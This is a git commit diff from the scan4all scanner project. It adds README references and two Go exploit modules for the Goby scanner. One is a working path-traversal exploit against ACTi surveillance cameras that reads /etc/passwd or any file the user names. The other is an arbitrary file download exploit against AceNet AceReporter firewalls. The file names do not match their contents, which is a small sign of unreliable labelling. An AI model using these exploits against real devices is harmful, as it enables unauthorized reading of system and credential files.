up goby_pocs 2023-09-30

Author: hktalent

README.md

@@ -171,6 +171,14 @@ priorityNmap=false ./scan4all -tp http -list allOut.txt -v
 
 more see: <a href=https://github.com/hktalent/scan4all/discussions>discussions</a>
 
+# References 
+- https://www.77169.net/html/312916.html
+- https://zhuanlan.zhihu.com/p/636131542
+- https://github.com/hktalent/scan4all/blob/main/static/Installation.md
+- https://github.com/hktalent/scan4all/blob/main/static/NicePwn.md
+- https://github.com/hktalent/scan4all/blob/main/static/running.md
+- https://www.google.com/search?client=safari&rls=en&q=%22hktalent%22+%22scan4all%22&ie=UTF-8&oe=UTF-8#ip=1
+
 # Thanks 
 - Thank <a href=https://github.com/freeload101 target=_blank>@freeload101</a> and other friends for their donations and support
 

config/51pwn/CRLF.yaml

@@ -0,0 +1,105 @@
+package exploits
+
+import (
+	"fmt"
+	"git.gobies.org/goby/goscanner/goutils"
+	"git.gobies.org/goby/goscanner/jsonvul"
+	"git.gobies.org/goby/goscanner/scanconfig"
+	"git.gobies.org/goby/httpclient"
+	"strings"
+)
+
+func init() {
+	expJson := `{
+  "Name": "ACTI Camera images File read",
+  "Description": "Arbitrary file reading vulnerability in acti video surveillance",
+  "Product": "ACTI Camera",
+  "Homepage": "http://www.acti.com",
+  "DisclosureDate": "2021-05-17",
+  "Author": "PeiQi",
+  "GobyQuery": "app=\"ACTi-Cameras-and-Surveillance\"",
+  "Level": "1",
+  "Impact": "Server arbitrary file read",
+  "Recommendation": "",
+  "References": [
+    "http://wiki.peiqi.tech"
+  ],
+  "HasExp": true,
+  "ExpParams": [
+    {
+      "name": "File",
+      "type": "input",
+      "value": "/etc/passwd"
+    }
+  ],
+  "ExpTips": {
+    "Type": "",
+    "Content": ""
+  },
+  "ScanSteps": [
+    "AND",
+    {
+      "Request": {
+        "data": "",
+        "data_type": "text",
+        "follow_redirect": true,
+        "method": "GET",
+        "uri": "/"
+      },
+      "ResponseTest": {
+        "checks": [
+          {
+            "bz": "",
+            "operation": "==",
+            "type": "item",
+            "value": "200",
+            "variable": "$code"
+          }
+        ],
+        "operation": "AND",
+        "type": "group"
+      }
+    }
+  ],
+  "ExploitSteps": null,
+  "Tags": ["File read"],
+  "CVEIDs": null,
+  "CVSSScore": "0.0",
+  "AttackSurfaces": {
+    "Application": ["ACTI Camera"],
+    "Support": null,
+    "Service": null,
+    "System": null,
+    "Hardware": null
+  }
+}`
+
+	ExpManager.AddExploit(NewExploit(
+		goutils.GetFileName(),
+		expJson,
+		func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool {
+			uri := "/images/../../../../../../../../etc/passwd"
+			cfg := httpclient.NewGetRequestConfig(uri)
+			cfg.VerifyTls = false
+			cfg.FollowRedirect = false
+			cfg.Header.Store("Content-type", "application/x-www-form-urlencoded")
+			if resp, err := httpclient.DoHttpRequest(u, cfg); err == nil {
+        		return resp.StatusCode == 200 && strings.Contains(resp.Utf8Html, "root")
+        	}
+        	return false
+		},
+		func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult {
+		    file := ss.Params["File"].(string)
+		    uri := fmt.Sprintf("/images/../../../../../../../..%s", file)
+			cfg := httpclient.NewGetRequestConfig(uri)
+			cfg.VerifyTls = false
+			cfg.FollowRedirect = false
+			cfg.Header.Store("Content-type", "application/x-www-form-urlencoded")
+			if resp, err := httpclient.DoHttpRequest(expResult.HostInfo, cfg); err == nil {
+        		expResult.Output = resp.Utf8Html
+        		expResult.Success = true
+        	}
+			return expResult
+		},
+	))
+}                   

lib/goby/goby_pocs/ACTI_camera_images_File_read.go

@@ -0,0 +1,136 @@
+package exploits
+
+import (
+	"git.gobies.org/goby/goscanner/goutils"
+)
+
+func init() {
+	expJson := `{
+  "Name": "AceNet AceReporter Report component Arbitrary file download",
+  "Description": "All firewall devices that use the AceNet AceReporter report component can download arbitrary files",
+  "Product": "AceNet AceReporter Report component",
+  "Homepage": "",
+  "DisclosureDate": "2021-08-04",
+  "Author": "[email protected]",
+  "GobyQuery": "title=\"Login @ Reporter\" || title=\"Technology, Inc.\"",
+  "Level": "2",
+  "Impact": "<p><span style=\"font-size: 14px;\">The vulnerability of arbitrary file download or read is mainly caused by the fact that when the application system provides the function of file download or read, the application system directly specifies the file path in the file path parameter without verifying the validity of the file path. As a result, the attacker can jump through the directory (..</span><span style=\"font-size: 14px;\">\\ or..</span><span style=\"font-size: 14px;\">/) to download or read a file beyond the original specified path.</span><span style=\"font-size: 14px;\">The attacker can finally download or read any files on the system through this vulnerability, such as database files, application system source code, password configuration information and other important sensitive information, resulting in sensitive information leakage of the system.</span><br></p>",
+  "Recommandation": "<p><span style=\"font-size: 14px;\">Limit ..</span><span style=\"font-size: 14px;\">/ symbol is used to determine the input path when the file is downloaded. The best method is that the file should be one to one in the database, and avoid entering the absolute path to obtain the file</span><br></p>",
+  "References": [
+    "https://www.cnvd.org.cn/flaw/show/CNVD-2021-41972"
+  ],
+  "HasExp": true,
+  "ExpParams": [
+    {
+      "name": "path",
+      "type": "createSelect",
+      "value": "../../../../../../../../../etc/passwd,../../../../../../../../../etc/hosts",
+      "show": ""
+    }
+  ],
+  "ExpTips": {
+    "Type": "",
+    "Content": ""
+  },
+  "ScanSteps": [
+    "AND",
+    {
+      "Request": {
+        "method": "GET",
+        "uri": "/view/action/download_file.php?filename=../../../../../../../../../etc/passwd&savename=data.txt",
+        "follow_redirect": true,
+        "header": {},
+        "data_type": "text",
+        "data": ""
+      },
+      "ResponseTest": {
+        "type": "group",
+        "operation": "AND",
+        "checks": [
+          {
+            "type": "item",
+            "variable": "$body",
+            "operation": "contains",
+            "value": "root",
+            "bz": ""
+          },
+          {
+            "type": "item",
+            "variable": "$body",
+            "operation": "contains",
+            "value": "daemon",
+            "bz": ""
+          }
+        ]
+      },
+      "SetVariable": []
+    },
+    {
+      "Request": {
+        "method": "GET",
+        "uri": "/view/action/download_file.php?filename=../../../../../../../../../etc/hosts&savename=data.txt",
+        "follow_redirect": true,
+        "header": {},
+        "data_type": "text",
+        "data": ""
+      },
+      "ResponseTest": {
+        "type": "group",
+        "operation": "AND",
+        "checks": [
+          {
+            "type": "item",
+            "variable": "$code",
+            "operation": "==",
+            "value": "200",
+            "bz": ""
+          },
+          {
+            "type": "item",
+            "variable": "$body",
+            "operation": "contains",
+            "value": "127.0.0.1",
+            "bz": ""
+          }
+        ]
+      },
+      "SetVariable": []
+    }
+  ],
+  "ExploitSteps": [
+    "AND",
+    {
+      "Request": {
+        "method": "GET",
+        "uri": "/view/action/download_file.php?filename={{{path}}}&savename=data.txt",
+        "follow_redirect": true,
+        "header": {},
+        "data_type": "text",
+        "data": ""
+      },
+      "SetVariable": [
+        "output|lastbody"
+      ]
+    }
+  ],
+  "Tags": [
+    "file download"
+  ],
+  "CVEIDs": null,
+  "CVSSScore": "0.0",
+  "AttackSurfaces": {
+    "Application": null,
+    "Support": null,
+    "Service": null,
+    "System": null,
+    "Hardware": null
+  }
+}`
+
+	ExpManager.AddExploit(NewExploit(
+		goutils.GetFileName(),
+		expJson,
+		nil,
+		nil,
+	))
+}